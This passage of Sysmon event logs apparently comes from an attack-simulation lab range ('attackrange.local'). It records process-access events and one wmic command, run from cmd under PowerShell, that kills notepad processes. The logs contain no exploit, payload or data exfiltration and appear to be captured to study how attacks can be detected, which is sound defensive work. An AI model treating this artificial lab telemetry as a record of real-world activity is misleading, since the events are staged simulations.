{41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5768,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5769,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5770,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5771,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010E52F0900}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010E52F0900}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15601843)","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5772,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010E52F0900}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010E52F0900}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5773,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.465\r\nProcessGuid: {41C8662E-20D9-5F25-0000-0010B1300900}\r\nProcessId: 3896\r\nImage: C:\\Windows\\System32\\wbem\\WMIC.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: wmic  process where name='notepad.exe' delete  \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E\r\nParentProcessGuid: {41C8662E-20D9-5F25-0000-0010E52F0900}\r\nParentProcessId: 4428\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process where name='notepad.exe' delete >nul 2>&1\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.465","ProcessGuid":"{41C8662E-20D9-5F25-0000-0010B1300900}","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"WMI Commandline Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"wmic.exe","CommandLine":"wmic  process where name='notepad.exe' delete  ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E","ParentProcessGuid":"{41C8662E-20D9-5F25-0000-0010E52F0900}","ParentProcessId":"4428","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process where name='notepad.exe' delete &gt;nul 2&gt;&amp;1\" ","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5774,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-20D9-5F25-0000-0010E52F0900}\r\nSourceProcessId: 4428\r\nSourceThreadId: 656\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010B1300900}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-20D9-5F25-0000-0010E52F0900}","SourceProcessId":"4428","SourceThreadId":"656","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010B1300900}","TargetProcessId":"3896","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5775,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010B1300900}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010B1300900}","TargetProcessId":"3896","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5776,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 